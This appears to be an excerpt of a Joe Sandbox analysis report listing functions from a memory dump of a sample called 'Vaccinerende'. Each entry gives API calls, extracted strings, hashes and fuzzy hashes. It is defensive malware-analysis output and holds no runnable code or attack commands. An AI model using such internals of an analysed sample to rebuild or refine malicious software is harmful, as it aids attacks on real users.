                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                              • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                              Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                              • String ID: 0$6
                                                                              • API String ID: 2029023288-3849865405
                                                                              • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                              • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                              Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                              • memset.MSVCRT ref: 00405455
                                                                              • memset.MSVCRT ref: 0040546C
                                                                              • memset.MSVCRT ref: 00405483
                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$memcpy$ErrorLast
                                                                              • String ID: 6$\
                                                                              • API String ID: 404372293-1284684873
                                                                              • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                              • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                              Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                              • String ID:
                                                                              • API String ID: 1331804452-0
                                                                              • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                              • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                              Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                              • <%s>, xrefs: 004100A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_snwprintf
                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                              • API String ID: 3473751417-2880344631
                                                                              • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                              • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                              Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscat$_snwprintfmemset
                                                                              • String ID: %2.2X
                                                                              • API String ID: 2521778956-791839006
                                                                              • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                              • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                              Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintfwcscpy
                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                              • API String ID: 999028693-502967061
                                                                              • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                              • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                              Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • strlen.MSVCRT ref: 00408DFA
                                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                              • memset.MSVCRT ref: 00408E46
                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memsetstrlen
                                                                              • String ID:
                                                                              • API String ID: 2350177629-0
                                                                              • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                              • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                              Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                              • API String ID: 2221118986-1606337402
                                                                              • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                              • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                              Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                              • memcmp.MSVCRT ref: 00408FB3
                                                                              • memset.MSVCRT ref: 00408FD4
                                                                              • memcmp.MSVCRT ref: 00409025
                                                                              • memset.MSVCRT ref: 00409042
                                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                              • String ID:
                                                                              • API String ID: 265355444-0
                                                                              • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                              • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                              Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                              • memset.MSVCRT ref: 0040C439
                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                              • String ID:
                                                                              • API String ID: 4131475296-0
                                                                              • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                              • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                              Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004116FF
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                              • API String ID: 2618321458-3614832568
                                                                              • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                              • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                              Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFilefreememset
                                                                              • String ID:
                                                                              • API String ID: 2507021081-0
                                                                              • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                              • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                              Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                              • malloc.MSVCRT ref: 00417524
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                              • free.MSVCRT ref: 00417544
                                                                              • free.MSVCRT ref: 00417562
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                              • String ID:
                                                                              • API String ID: 4131324427-0
                                                                              • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                              • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                              Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                              • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                              • free.MSVCRT ref: 0041822B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PathTemp$free
                                                                              • String ID: %s\etilqs_$etilqs_
                                                                              • API String ID: 924794160-1420421710
                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                              Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                              • API String ID: 1775345501-2769808009
                                                                              • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                              • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                              Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wcscpy.MSVCRT ref: 0041477F
                                                                              • wcscpy.MSVCRT ref: 0041479A
                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                                              • String ID: General
                                                                              • API String ID: 999786162-26480598
                                                                              • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                              • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                              Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
